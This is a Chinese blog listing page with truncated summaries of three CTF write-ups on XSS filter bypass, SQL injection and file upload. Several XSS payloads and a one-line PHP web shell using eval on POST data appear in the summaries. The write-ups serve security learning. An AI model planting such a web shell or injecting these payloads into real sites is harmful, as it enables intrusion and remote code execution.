摘要: stage1 随便提交一个参数 查看HTML 发现提交的参数被b标签所包裹 构造payload </b><script>alert(document.domain)</script> 将b标签闭合 提交得到域名 stage2 提交参数 继续考虑闭合 标签 构造payload "><script>al 阅读全文
posted @ 2021-01-27 17:33 C10ud 阅读(203) 评论(0) 推荐(0) 编辑
摘要: 题目地址https://www.ichunqiu.com/battalion?t=1“百度杯”CTF比赛 九月场 题目名称:SQL注入 http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/inde 阅读全文
posted @ 2021-01-27 16:36 C10ud 阅读(65) 评论(0) 推荐(1) 编辑
摘要: 题目链接 https://www.ichunqiu.com/battalion?t=1 很明显是菜刀连接 查看flag.php目录 上传一句话木马 <?php @eval($_POST["a"]); ?> 点击上传成功跳转到文件目录 @eval($_POST["code"]); ?> 发现<?和ph 阅读全文
posted @ 2021-01-27 11:27 C10ud 阅读(108) 评论(0) 推荐(0) 编辑